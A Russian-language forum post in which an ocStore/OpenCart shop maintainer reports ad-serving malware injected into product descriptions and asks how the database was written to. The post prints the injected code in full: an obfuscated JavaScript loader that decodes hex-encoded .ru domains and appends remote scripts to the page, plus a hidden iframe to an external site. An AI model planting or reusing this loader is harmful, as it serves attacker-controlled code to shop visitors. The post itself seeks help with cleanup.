JS-вирусы в описаниях товаров Opencart

Приветствую.

Имеется магаз на ocStore 1.5.4.1. Где-то месяц назад были замечены странные события на некоторых страницах сайта - в фоне открывалась какая-то тупая реклама. Наблюдал это владелец сайта, мне же не удалось обнаружить такую проблему. Поэтому решили, что проблема на его стороне - какие-то плагины в браузере левые.

Но сегодня был таки обнаружен странный жс-скрипт на некоторых страницах. Заметил не я, потому он был удален без каких-либо сожалений. Попросили, чтобы я сайт почистил, т.к. руками проверять 1500 страниц владельцу было лень.

Поиском по БД было обнаружено еще 6 страниц с таким скриптом. Вот его код:

<script>

window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="8066",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},a=function(o,e,t){var n=document.location.protocol+"//"+o;if(window.smlo)window.smlo.loadSmlo(n);else if(window.zSmlo)window.zSmlo.loadSmlo(n);else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("site.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();</script>

<p>

	<iframe id="a1996667054" src="http://ui5nvtxlm.ru/f.html" style="display: none;"></iframe></p>

Вставил так, как скопировал с БД.

Почему я не успокоился после простой чистки сайта:

если кто не помнит весной была "эпидемия" фейковых заказов в ИМ . Потом выяснилось что это баловство, попытка шантажом получить денежку за якобы закрытие дыр в движке сайта. При этом в письмах, которые получали владельцы сайтов писалось, что злоумышленники якобы имеют прямой доступ к БД.

Когда были проверены возможная утечка паролей от админки сайта, фтп и т.п., но не обнаружено проблем у меня и всплыла в памяти та история.

Встречал ли кто такую проблему и как с ней боролся? Действительно ли это дыра, что дает доступ на запись в БД?

Какие мысли по этому поводу?